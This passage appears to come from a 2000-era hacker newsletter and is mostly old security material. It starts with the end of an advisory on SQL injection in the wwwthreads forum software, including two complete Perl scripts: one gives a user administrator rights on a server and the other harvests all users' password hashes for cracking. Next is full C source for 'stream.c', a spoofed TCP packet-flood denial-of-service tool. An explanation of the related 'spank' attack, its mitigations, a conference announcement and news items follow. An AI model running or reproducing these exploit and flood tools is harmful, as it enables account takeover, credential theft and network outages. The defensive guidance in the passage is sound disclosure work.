wwwthreads nicely slaps the '_q' on the variables, it's easy to see. See it? $Sort, $PostsPer, $TextCols, and $TextRows aren't quoted. Now, let's figure out where that data comes from my $Sort = $FORM{'sort_order'}; my $PostsPer = $FORM{'PostsPer'}; my $TextCols = $FORM{'TextCols'}; my $TextRows = $FORM{'TextRows'}; Wow, they're taken straight from the submitted form data. That means they are not checked or validated in any way. Here's our chance! Going back to structure of the user record (given above), there's a 'Status' field we need to change. Looking in this UPDATE query, Status isn't listed. So this means that the Status field is going to remain unchanged. Bummer. See what we're going to do yet? Take a second and think about it. Remember, all of this hinges around the fact that we want to submit what looks like data, but in the end, the SQL engine/database will interpret it differently. Notice in the query that the fields are listed in the format of field=value, field=value, field=value, etc (of course, they're on separate lines). If I were to insert some fake values (for the sake of example), I might have Name='rfp', Signature='rfp', Homepage='www.wiretrip.net/rfp/' All I did was put the fields on the same line, collapse the whitespace, and fill in the (quoted) string values. This is valid SQL. Now, let's put this all together. Looking at the the 'Sort' variable (which is numeric), we would feasibly have Bio='puppy', Sort=5, Display='threaded' which is still valid SQL. Since $Sort=$FORM{'sort_order'}, that means the above value for Sort was given by submitting the parameter sort_order=5. Now, let's use Sort to our advantage. What if we were to include a comma, and then some more column values? Oh, say, the Status field? Let's set the sort_order parameter to "5, Status='Administrator',", and then let it run its course. Eventually we'll get a query that looks like Bio='puppy', Sort=5, Status='Administrator', Display='threaded' ^^^^^^^^^^^^^^^^^^^^^^^^^^ our submitted data This is still valid SQL! And furthermore, it will cause the database to update the Status field to be 'Administrator'! But remember when we looked in adduser.pl, the first user had a Security level of 100. We want that to, so we just set the sort_order parameter to "5, Status='Administrator', Security=100,", and then we get Bio='puppy', Sort=5, Status='Administrator', Security=100, ... which updates both values to what we want. The database not knowing any better will update those two fields, and now the forums will think we're an administrator. So I go to apply this new technique on PacketStorm...and get a 404 for requests to changeprofile.pl. Yep, the pro version doesn't have it. Navigating the 'Edit Profile' menu, I see that it has 'Basic Profile', 'Display Preferences', and 'Email Notifications/Subscriptions', which the demo does not (it's all lumped together). Wonderful. If they changed the scripts around, they may have also changed the SQL queries (well they had to, actually). So now we're in 'blackbox' mode (blindly making educated guesses on what's going on). Since we want to play with the sort_order parameter still, you'll see that it's contained in the 'Display Preferences' script (editdisplay.pl). This script handles the sort_order, display, view, PostPer, Post_Format, Preview, TextCols, TextRows, FontSize, FontFace, PictureView, and PicturePost (gained by viewing the HTML source). So it's a subset of the parameters. Using the above code snippets, we can guess at what the SQL query looking like. So why not give it a shot. First I poke some invalid values into sort_order (characters instead of numbers). This causes an error, which I figured. Since, in the first example how the fields where 'B_' for the 'Board' table, the 'User' table (which we are now using) prefixes colums with a 'U_'. So that means we need to use 'U_Status' and 'U_Security' for field names. Good thing we checked. Since this needs to be a valid form submit, we need to submit values for all of the listed variables. At this point I should also point out (again) we need a valid user account of which to increase the status. We'll need the username and password (hash), which are printed as hidden form elements on various forms (like editdisplay.pl). You'll see the parameters are Username and Oldpass. So based on all of this, we can construct a URL that looks like changedisplay.pl? Cat=& Username=rfp &Oldpass=(valid password hash) &sort_order=5,U_Status%3d'Administrator',U_Security%3d100 &display=threaded &view=collapsed &PostsPer=10 &Post_Format=top &Preview=on &TextCols=60 &TextRows=5 &FontSize=0 &FontFace= &PictureView=on &PicturePost=off The important one of course being &sort_order=5,U_Status%3d'Administrator',U_Security%3d100 which is just an escaped version of what we used above (the %3d translate to the '=' character). When you lump it all together into a single string, you get changedisplay.pl?Cat=&Username=rfp&Oldpass=(valid password hash) &sort_order=5,U_Status%3d'Administrator',U_Security%3d100&display=threaded &view=collapsed&PostsPer=10&Post_Format=top&Preview=on&TextCols=60 &TextRows=5&FontSize=0&FontFace=&PictureView=on&PicturePost=off which, while gross, is what it needs to be. So, I submit this to PacketStorm, and get Your display preferences have been modified. Wonderful. But, noticing on the top menu, I see an 'Admin' option now. I click it, and what do I see but the heart warming message of As an Administrator the following options are available to you. Bingo! Administrator privileges! Looking at my options, I can edit users, boards, or forums, assign moderators and administrators, ban users/hosts, expire/close/open threads, etc. Now for our second objective...the passwords. I go into 'Show/Edit Users', and am asked to pick the first letter of the usernames I'm interested in. So I pick 'R'. At list of all 'R*' users comes up. I click on 'rfp'. And there we go, my password hash. Unfortunately, there's no nice and easy way to dump all users and their hashes. Bummer. So I automated a perl script to do it for me, and dump the output in a format that can be fed into John the Ripper. ----[ 3. Solution Now, how to defend against this? As you saw, the reason this worked was due to non-restricted data being passed straight into SQL queries. Luckily wwwthreads quoted (most) string data, but they didn't touch numeric data. The solution is to make sure numeric data is indeed numeric. You can do it the 'silent' way by using a function like so sub onlynumbers { ($data=shift)=~tr/0-9//cd; return $data;} And similar to how all string data is passed through DBI->quote(), pass all numeric data through onlynumbers(). So, for the above example, it would be better to use my $Sort = onlynumbers($FORM{'sort_order'}); Another area that needs to be verified is the table name. In our very first example, we had 'Board=general'. As you see here, a table name is not quoted like a string. Therefore we also need to run all table names through a function to clean them up as well. Assuming table names can have letters, numbers, and periods, we can scrub it with sub scrubtable { ($data=shift)=~tr/a-zA-Z0-9.//cd; return $data;} which will remove all other cruft. In the end, *all* (let me repeat that... **ALL**) incoming user data should be passed through quote(), onlynumbers(), or scrubtable()...NO EXCEPTIONS! Passing user data straight into a SQL query is asking for someone to tamper with your database. New versions of wwwthreads are available from www.wwwthreads.com, which implement the solutions pretty much as I've described them here. ----[ 4. Conclusion I've included two scripts below. wwwthreads.pl will run the query for you against a pro version of wwwthreads. You just have to give the ip address of the server running wwwthreads, and a valid user and password hash. w3tpass.pl will walk and download all wwwthreads user password hashes, and give output suitable for password cracking with John the Ripper. Thanks to PacketStorm for being a good sport about this. - Rain Forest Puppy / rfp@wiretrip.net - I feel a rant coming on... ----[ 5. Included perl scripts -[ wwwthreads.pl #!/usr/bin/perl # wwwthreads hack by rfp@wiretrip.net # elevate a user to admin status # # by rain forest puppy / rfp@wiretrip.net use Socket; ##################################################### # modify these # can be DNS or IP address $ip="209.143.242.119"; $username="rfp"; # remember to put a '\' before the '$' characters $passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh"; ##################################################### $parms="Cat=&Username=$username&Oldpass=$passhash". "&sort_order=5,U_Status%3d'Administrator',U_Security%3d100". "&display=threaded&view=collapsed&PostsPer=10". "&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0". "&FontFace=&PictureView=on&PicturePost=off"; $tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n". "Referer: http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n"; print sendraw($tosend); sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} -[ w3tpass.pl #!/usr/bin/perl # download all wwwthread usernames/passwords once you're administrator # send a fake cookie with authenciation and fake the referer # initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1 # # by rain forest puppy / rfp@wiretrip.net use Socket; ##################################################### # modify these # can be DNS or IP address $ip="209.143.242.119"; $username="rfp"; # remember to put a '\' before the '$' characters $passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv"; ##################################################### @letts=split(//,'0ABCDEFGHIJKLMNOPQRSTUVWXYZ'); print STDERR "wwwthreads password snatcher by rain forest puppy\r\n"; print STDERR "Getting initial user lists..."; foreach $let (@letts){ $parms="Cat=&Start=$let"; $tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n". "Referer: http://$ip/cgi-bin/wwwthreads/\r\n". "Cookie: Username=$username; Password=$passhash\r\n\r\n"; my @D=sendraw($tosend); foreach $line (@D){ if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){ push @users, $1;}}} $usercount=@users; print STDERR "$usercount users retrieved.\r\n". "Fetching individual passwords...\r\n"; foreach $user (@users){ $parms="User=$user"; $tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n". "Referer: http://$ip/cgi-bin/wwwthreads/\r\n". "Cookie: Username=$username; Password=$passhash\r\n\r\n"; my @D=sendraw($tosend); foreach $line (@D){ if($line=~/OldPass value = "([^"]+)"/){ ($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; print $user.':'.$pass."::::::::::\n"; last;}}} print STDERR "done.\r\n\r\n"; sub sendraw { my ($pstr)=@_; my $target; $target= inet_aton($ip) || die("inet_aton problems"); socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,80,$target)){ select(S); $|=1; print $pstr; my @in=; select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); }} # Greets to everyone who hasn't used RDS to deface a website (small crowd) --- rain forest puppy / rfp@wiretrip.net ------------- ADM / wiretrip --- SQL hacking has many ins, many outs; there's many levels of complexity... --- Advisory RFP2K01 ------------------------------ rfp.labs ------------ _____________________________________________________________________ ** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice" ** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST" SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net @HWA 13.0 The stream.c exploit ~~~~~~~~~~~~~~~~~~~~ #include #include #include #include #include #include #include #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include #include #include #include #include #include #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif struct ip_hdr { u_int ip_hl:4, /* header length in 32 bit words */ ip_v:4; /* ip version */ u_char ip_tos; /* type of service */ u_short ip_len; /* total packet length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset */ u_char ip_ttl; /* time to live */ u_char ip_p; /* protocol */ u_short ip_sum; /* ip checksum */ u_long saddr, daddr; /* source and dest address */ }; struct tcp_hdr { u_short th_sport; /* source port */ u_short th_dport; /* destination port */ u_long th_seq; /* sequence number */ u_long th_ack; /* acknowledgement number */ u_int th_x2:4, /* unused */ th_off:4; /* data offset */ u_char th_flags; /* flags field */ u_short th_win; /* window size */ u_short th_sum; /* tcp checksum */ u_short th_urp; /* urgent pointer */ }; struct tcpopt_hdr { u_char type; /* type */ u_char len; /* length */ u_short value; /* value */ }; struct pseudo_hdr { /* See RFC 793 Pseudo Header */ u_long saddr, daddr; /* source and dest address */ u_char mbz, ptcl; /* zero and protocol */ u_short tcpl; /* tcp length */ }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; /* struct tcpopt_hdr opt; */ }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; u_short dstport, pktsize, pps; u_long dstaddr; int sock; void usage(char *progname) { fprintf(stderr, "Usage: %s \n", progname); fprintf(stderr, " dstaddr - the target we are trying to attack.\n"); fprintf(stderr, " dstport - the port of the target, 0 = random.\n"); fprintf(stderr, " pktsize - the extra size to use. 0 = normal syn.\n"); exit(1); } /* This is a reference internet checksum implimentation, not very fast */ inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s.\n", hostname); exit(1); } return *(u_long *)hp->h_addr; } void flooder(void) { struct timespec ts; int i; memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 10; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0x08; packet.ip.ip_id = rand(); packet.ip.ip_len = FIX(sizeof(packet)); packet.ip.ip_off = 0; /* IP_DF? */ packet.ip.ip_ttl = 255; packet.ip.ip_dst.s_addr = random(); packet.tcp.th_flags = 0; packet.tcp.th_win = htons(16384); packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 5; /* 5 */ packet.tcp.th_urp = 0; packet.tcp.th_dport = dstport?htons(dstport):rand(); /* packet.opt.type = 0x02; packet.opt.len = 0x04; packet.opt.value = htons(1460); */ cksum.pseudo.daddr = dstaddr; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = htons(sizeof(struct tcphdr)); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = dstaddr; s_in.sin_port = packet.tcp.th_dport; for(i=0;;++i) { /* patched by 3APA3A to send 1 syn packet + 1023 ACK packets. */ if( !(i&0x4FF) ) { packet.tcp.th_sport = rand(); cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); packet.tcp.th_flags = TH_SYN; packet.tcp.th_ack = 0; } else { packet.tcp.th_flags = TH_ACK; packet.tcp.th_ack = random(); } /* cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); */ ++packet.ip.ip_id; /*++packet.tcp.th_sport*/; ++packet.tcp.th_seq; if (!dstport) s_in.sin_port = packet.tcp.th_dport = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) perror("jess"); } } int main(int argc, char *argv[]) { int on = 1; printf("stream.c v1.0 - TCP Packet Storm\n"); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } setgid(getgid()); setuid(getuid()); if (argc < 4) usage(argv[0]); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(1); } srand((time(NULL) ^ getpid()) + getppid()); printf("\nResolving IPs..."); fflush(stdout); dstaddr = lookup(argv[1]); dstport = atoi(argv[2]); pktsize = atoi(argv[3]); printf("Sending..."); fflush(stdout); flooder(); return 0; } @HWA 14.0 Spank, variation of the stream.c DoS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ------------------------------------------------ Explanation of the 'spank' attack -- a new breed stream/raped ------------------------------------------------ By: lst (yardley@uiuc.edu) This is a tad different than the previous release. Stream/Raped mearly flooded the host with ack's (or no flags) and came from random ips with random sequence numbers and/or ack numbers. The difference now is that this not only does the previous stuff, but also directly attacks from and to multicast addresses as well. Just as before, rate limiting should be done to counteract its effect (the same idea as ICMP_BANDLIM). The multicast handling should also be checked to verify that it is behaving properly. The attacker specifies the port[s] that they want to send the attack to, depending on what ports are selected, you will have different net results. If the port is an open port, then you will possibly have a longer kernel path to follow before the drop. Therefore, a smart attacker will hit open ports, but havoc can also come about from random ports due to states and processing. In the best case scenario, you will experience only the lag of the flood and the lag of the processing (currently) and then be fine when the attacker stops, In the worst case, you lockup, kill the network, and possibly have to reboot. Once you patch it, you deal with a lot less processing time (the drops are handled without the RST flag when appropriate--bandlim type idea). In other words, you go to the drop routine instead of dropwithrst silencing your response, which decreases your processing time, the hit on your network, and the effect of the flood (once a threshold is reached, all those bad packets are silently dropped and the attack has less of a net effect). The filters that were presented at the beginning of this email will block all multicast packets that come out (and in) the tcp stack I have been getting mailed a lot about this. Here is why I said the previous statement. Receiving a packet with no flags is considered an illegal packet (obviously) and is often dumped, however, as we have seen in the past, illegal packets often wreak havoc and often go untested. There is very little that "raped.c" or "stream.c" actually showed as problems in the TCP/IP stacks. The true problem lies more in the effects of the response (caused by the attack). This is the same concept as the SYN floods of yesteryear, and the same type of thing will be done to handle it. The main difference is that it will be on a simpler note because there isn't much need for a "cookie" based system. One should just throttle the response of the reset packets which in turn will help stop the storm that you generate and in general, harden the tcp/ip stack to behave the way it is supposed to. The main effect of this attack is that you are shooting back RST+ACK's at all the spoofed hosts. Obviously, a lot of these hosts will not exist and you will get ICMP unreaches (as an example) bounced back at you. There are other possibilities as well, but unreach would be the most common (redirects might be common as well although i did not spend the time to analyze that). The ones that don't respond back may send you some packets back as well (depending on if the port was valid or not and what their firewall rules are). This type of attack is complicated by the multicasts, and the effect is amplified as well. All in all, it becomes very nasty very quick. Basically, this causes a nice little storm of packets, in the ideal case. Note that I said ideal case in the previous paragraph. This is not always the observed behavior. It all depends on what is on the subnet, what type of packets are recieved, what rules and filters you have setup, and even the duration of the flood. It has been pointed out several times that the machine will go back to normal once the attack is stopped, which is exactly why something like ICMP_BANDLIM will work. I have also been asked a lot about what this "bug" affects. I have seen it have effects on *BSD, Linux, Solaris, and Win* as far as OS's go. It has also seemed to affect some hubs, switches, routers, or gateways since entire subnets have "disappeared" briefly after the attack. The multicast attack seems to be more deadly to teh network than the previous attack and its affects get amplified and even carried over to the rest of the network (bypassing secluded network bounds). I don't have more specifics on the systems affected because of the difficulty in testing it (and keeping the network up) since I do not have local access to the networks that I tested on, and remote access gets real ugly real fast. Another possibility that has been suggested as to why some machines die is that the machine's route table is being blown up by the spoofed packets. Each spoofed packet has a different source address which means that a temporary route table entry is being created for each one. These entries take time to timeout. Use 'vmstat -m' and check the 'routetbl' field while the attack is going on. Route table entries can be controlled somewhat under freebsd with: [root@solid]::[~] sysctl -a | fgrep .rt net.inet.ip.rtexpire: 3600 net.inet.ip.rtminexpire: 10 net.inet.ip.rtmaxcache: 128 You can do the following, to help if the route table is at least part of the problem: sysctl -w net.inet.ip.rtexpire=2 sysctl -w net.inet.ip.rtminexpire=2 Things that will help: 1. Drop all multicast packets (ingress and egress) that are addressed to the tcp stack because multicasts are not valid for tcp. 2. Extend bandwidth limiting to include RST's, ACK's and anything else that you feel could affect the stability of the machine. 3. Don't look for listening sockets if the packet is not a syn I hope that this helps, or explains a little more at least. --------------------------------------------------- Temporary remedy --------------------------------------------------- If you use ipfilter, this MAY help you, but the issue is quite a bit different than the previous issue. -- start rule set -- block in quick proto tcp from any to any head 100 block in quick proto tcp from 224.0.0.0/28 to any group 100 pass in quick proto tcp from any to any flags S keep state group 100 pass out proto tcp from any to any flags S keep state pass in all -- end rule set -- optionally, a rule like the following could be inserted to handle outgoing packets (if they send from the firewall somehow) but you have bigger problems than the attack if that is the case. -- start additional rule -- block out proto tcp from any to 224.0.0.0/28 -- end additional rule -- That will help you "stop" the attack (actually it will just help minimize the affects), although it will still use some CPU though Note: If you use IPFW, there is no immediate way to solve this problem due to the fact that it is a stateless firewall. If you are getting attacked, then temporarily use ipfilter (or any other state based firewall) to stop it. Otherwise, wait for vendor patches or read more about the explanation for other possible workarounds. FreeBSD "unofficial patch" by Don Lewis: http://solid.ncsa.uiuc.edu/~liquid/patch/don_lewis_tcp.diff ----------------------- Conclusion ----------------------- This bug was found in testing. It seems a bit more lethal than the previous and should be addressed as such. Patches should be available now, but I do not follow all the platforms. -------------------- References -------------------- This was done independantly, although some of the analysis and reverse engineering of concept was done by other people. As a result, I would like to give credit where credit is due. The following people contributed in some way or another: Brett Glass Alfred Perlstein Warner Losh Darren Reed Don Lewis Also, I would like to send shouts out to w00w00 (http://www.w00w00.org) ------------------- Attached ------------------- These programs are for the sake of full disclosure, don't abuse them. Spank was written with libnet, so you will need to obtain that as well. You can find that at http://www.packetfactory.net/libnet For an "unofficial" patch: http://www.w00w00.org/files/spank/don_lewis_tcp.diff For spank.c: http://www.w00w00.org/files/spank/spank.c @HWA 15.0 Canadian Security Conference announcement: CanSecWest. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Canc0n may have failed as the first security/hacker con in Canada so here is a promising sounding event pulled off by professional boys. CanSecWest/core00 April, 19th, 20th, 21st, 2000 Vancouver, BC, Canada. "Every IT/Security person who can attend, should attend.CanSecWest/core00 promises to be the hardest hitting, most informative, and useful network security event ever held in Canada." Website: http://www.dursec.com/ Some high profile speakers are scheduled to appear: Noted speakers include: Ron Gula - Network Security Wizards Famous ex-U.S. government computer security analyst, who founded Network Security Wizards and authored the Dragon intrusion detection system. Ron will discuss intrusion detection sensors, drawing upon his large base of practical experience in the area. Ken Williams - Ernst & Young The creator of famous hacker super-site: packetstorm.securify.com. The infamous "tattooman" from genocide2600 now of Ernst&Young's security team will give some pointers on NT security. Marty Roesch - www.hiverworld.com Author of the popular "snort" intrusion detection system and senior software engineer on Hiverworld's "ARMOR" intrusion detection system. He will talk about good ways to "snort" out intruders. rain.forest.puppy - www.wiretrip.net Famous security paper author - one of those "he could take over the internet if he felt like it" kind of guys will amaze and amuse with some 0 day exploit training. Theo DeRaadt - OpenBSD The leader of the OpenBSD Secure operating system project will talk about securing operating systems. Fyodor - www.insecure.org Author of the award winning Nmap Security Scanner. He also maintains the popular Insecure.Org web site, the "Exploit World" vulnerability database, and several seminal papers describing techniques for stealth port scanning and OS detection via TCP/IP stack fingerprinting. Fyodor will demonstrate the use of Nmap to identify subtle security vulnerabilities in a network. Max Vision - www.maxvision.net - - www.whitehats.com Security consultant and author of the popular ArachNIDS (www.whitehats.com) public intrusion signature database will discuss intrusion forensics, attack fakes, attacker verification, and retaliation. Dragos Ruiu - dursec.com Tutorial author, founder of NETSentry Technology, former MPEG and ATM expert for HP and dursec.com founder; Dragos will be giving the first day's training. Dragos has instructed tens of thousands of people about digital video and high speed computer networks in highly rated HP training courses delivered in over 60 cities world-wide. A long-time security expert and instructor, his course material will explain this intricate subject through approachable explanations with applications and real-world examples that will help you apply this important knowledge to your computers immediately. @HWA 16.0 Security Portal review Jan 16th ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ******* Vendor Corner ******* Entrust - We Bring Trust to e-Business Entrust Technologies lets you tap into new global e-business markets by securing applications for Web, e-mail, ERP, VPN, desktop files and folders, as well as a comprehensive suite of solutions to deliver trusted e-business transactions to the exploding wireless Internet appliance market. For more information on this complete range of security solutions for e-business visit http://www.entrust.com . Come see us at RSA 2000, San Jose, CA, Jan.16-20, 2000, San Jose McEnery Convention Center, Booth #416. ******* What's new with SecurityPortal.com ******* Linux vs Microsoft: Who solves security problems faster? Does Open Source plug security holes quickly? We took a look at the security advisories issued by Microsoft and Red Hat in 1999 to gauge the time lag between the point of a "general community awareness" of a security problem and the point at which a patch was released. Find out who won here. SecurityPortal.com is proud to sponsor Techno-Security 2000 April 16-19, 2000 Wyndham Myrtle Beach Resort Myrtle Beach, South Carolina This one-of-a-kind conference is intended for private industry, government, law enforcement decision makers and technical experts interested in, or involved with information security, operations security, high tech crime and its prevention. Featured speakers include: Bill Murray, Dr. Dorothy Denning, Bill Crowell, Chris Goggans, Kevin Manson, Rick Forno, Dr. Myron Cramer, Don Delaney, Dr. Terry Gudaitis, Matt Devost and many more... This year's high intensity tracks will include: Hacker Profiling, Intrusion Detection, Beginner & Advance Computer Forensics, e-Commerce Security, Body Armor for Cyber-Cops, Information Terrorism, Live Vulnerability Testing, Incident Response, Tools for Protecting the Enterprise, PKI, plus many more. Registration is available on-line at: www.TheTrainingCo.com or call 410.703.0332 for more information. ******* Vendor Corner ******* Sponsored by Trend Micro, Inc. http://www.antivirus.com . ScanMail for Lotus Notes is a native Domino server application. - First product to provide complete, scaleable virus protection for Lotus Notes. - Detects and removes viruses hidden in databases and email attachments. - Provides real-time scanning of incoming and outgoing emails through the Domino server. - Infection notification and provides a Virus Activity Report to assist in tracing and securing virus point entry. - Multi-threaded architecture delivers high performance. - SmartScan eliminates redundant scanning to maximize server efficiency. ******* Top News ******* January 17, 2000 Welcome to SecurityPortal.com - The focal point for security on the Net. Biggest news of last week was probably the new encryption export regulations released by the U.S. We will let you know when our lawyers get through them. Recent postings in our top news : Jan 17, 2000 MSNBC: Microsoft certificate bug crashes Netscape browser - IIS 4 does not correctly support 56-bit certificates, so when Communicator tries to step up to the highest level of security (128-bit key length certificates), it simply crashes with an invalid page fault in NETSCAPE.EXE ZDNet: Computer glitch gives Canadian Microsoft Web site - a glitch at Network Solutions briefly gave a Canadian ownership of Microsoft.com and Yahoo.com over the weekend Jan 15, 2000 ABCNews: Online Credit Hacker May Be Out for Profit - While a computer hacker maintains that he stole credit card numbers from an online retailer as revenge for poor service and a couple of broken CDs, a security expert believes that Maxus is actually a two-man team in Russia engaged in a well-organized credit card fraud FCW: FBI beefs up cyberagent squads nationwide - The FBI plans to reinforce its mission to counter cyberattacks with the formation of new investigative teams specializing in computer intrusions and attacks at all 56 of its field offices around the country. The agency also plans to assign at least one computer forensics examiner to each field office ZDNet: Network Associates divides itself - Convinced that six smaller companies can compete better than one big one, Network Associates gives up on its integrated security strategy ZDNet: How to steal 2,500 credit cards - Just how easy is it to steal credit card numbers on the Internet? On Thursday, MSNBC was able to view nearly 2,500 credit card numbers stored by seven small e-commerce Web sites within a few minutes, using elementary instructions provided by a source. In all cases, a list of customers and all their personal information was connected to the Internet and either was not password-protected or the password was viewable directly from the Web site Jan 14, 2000 IDG: U.S., EU to meet on data privacy - The U.S. government has invited representatives from European Union countries to Washington D.C. next week to work out an agreement on data privacy before their self-imposed March deadline CNet: Security software firm Tripwire plans Linux push - Security software maker Tripwire is planning to unveil a major expansion into new types of computing products, especially those running on the Linux operating system ZDNet: Crypto compromise a lawyers' delight - It's supposed to make ease encryption export controls. But have the Clinton Administration's new regs instead created a legal maze? CA: COMPUTER ASSOCIATES WARNS OF A NEW VARIANT OF THE NEWAPT WORM CALLED NEWAPTd - Computer Associates International, Inc. yesterday warned computer users of a worm called "NewApt.D," a new variant belonging to the NewApt family of Win32 worms. The worm uses e-mail and executable attachments to propagate from one computer to another. This worm has been reported in the wild. The original NewApt worm was first detected in December 1999 Jan 13, 2000 CA: Virus Alert: COMPUTER ASSOCIATES DISCOVERS A NEW WORM CALLED Plage2000 - Computer Associates International, Inc. today warned computer users of a new worm called Plage2000 which could threaten computer email systems as well as eBusiness infrastructures. This worm has been reported to be in the wild by CA customers. CA's antivirus research team is analyzing this worm and will provide more details as they are determined InternetNews: Circle Tightens Around Online Credit Card Thief - Law enforcement officials may be closing in on Maxus, the Russian cracker who stole 300,000 credit card numbers from e-tailer CD Universe last month and dispensed them for free to visitors of his Web site Microsoft Bulletin: Patch Available for Spoofed LPC Port Request Vulnerability - The LPC vulnerability could allow a user logged onto a Windows NT 4.0 machine from the keyboard to become an administrator on the machine Yahoo: NSA Selects Secure Computing to Provide Type Enforcement on Linux - Secure Computing Corporation today announced that it has been awarded a sole source contract by the National Security Agency (NSA) to develop a Secure Linux Operating System (OS). This contract calls for Secure Computing to apply its patented Type Enforcement(TM) technology, to develop a robust and secure Linux platform. This award furthers the goal of Secure to pursue and acquire contracts that will provide enabling technologies to both the Federal government infrastructure as well as commercial electronic business applications ComputerWorld: Teens steal thousands of Net accounts - 2000 A group of teen-age computer crackers allegedly used thousands of stolen Internet accounts to probe the networks of two national nuclear weapons laboratories, according to law enforcement authorities in California Commerce Announces Streamlined Encryption Export Regulations - The U.S. Department of Commerce Bureau of Export Administration (BXA) today issued new encryption export regulations which implement the new approach announced by the Clinton Administration in September InfoWorld: Oracle turns focus to security with Release 2 of 8i database - With an eye on the complex security needs of large electronic-commerce sites, Oracle next week will introduce Release 2 of its flagship database, Oracle 8i, at the RSA Conference 2000 in San Jose, Calif FCW: Army establishes Infowar DMZ - The Army plans to establish network security demilitarized zones (DMZs) at all its bases worldwide as part of a plan to beef up its cyberdefenses against network intrusions and attacks Jan 12, 2000 FSecure: First Windows 2000 Virus Found - F-Secure Corporation, a leading provider of centrally-managed, widely distributed security solutions, today announced the discovery of the first Windows 2000 virus. Windows 2000 is the upcoming new operating system from Microsoft, due to be released later this year. The new virus is called Win2K.Inta or Win2000.Install. It appears to be written by the 29A virus group. It operates only under Windows 2000 and is not designed to operate at all under older versions of Windows Kurt's Closet: Some thoughts on (network) intrusion detection systems - Kurt makes the case for the necessity of emulated intelligence within intrusion detection systems and reviews some current research projects in this field RSA and Lotus Team to Provide Integrated Security for Lotus Notes and Domino R5 - Lotus to integrate RSA's KEON public key infrastructure software into Notes and Domino R5 ZDNet: Data thief threatens to strike again - An e-mail author claiming to be the thief who released as many as 25,000 stolen credit card numbers earlier this month told NBC News he'll soon start distributing more card numbers on a new Web site Wired: Domains Hijacked from NSI - Network Solutions' administrative policies are once again being blamed for Internet domain hijackings that took at least brief control over some major Web domains Jan 11, 2000 InternetNews: Cybercash Disputes Hacker's Claim - Cybercash Inc. is disputing an 18-year-old Russian cracker's claims that the company's credit card verification system was penetrated, resulting in the theft of thousands of credit card numbers from an online music store FoxNews: Designed for Destruction - Deliberately destructive viruses are on an upward trend, according to Symantec's Antivirus Research Center (SARC). Approximately 10 percent of 1993 viruses were deliberately destructive, but in 1997 that number rose to 35 percent. Often masquerading as innocuous e-mail, games or even fixes to real problems like the Y2K bug, today's viruses are more insidious than their counterparts were only a few years ago Wired: Crack Exposes Holes in the Web - There are Web site cracks, there are break-ins, and there are thefts. But now and then one rises above the fray to teach a sudden lesson about all things Internet NWFusion: Win 2000 VPN technology causes stir - When it ships next month, Microsoft's Windows 2000 will come with technology for setting up an IP 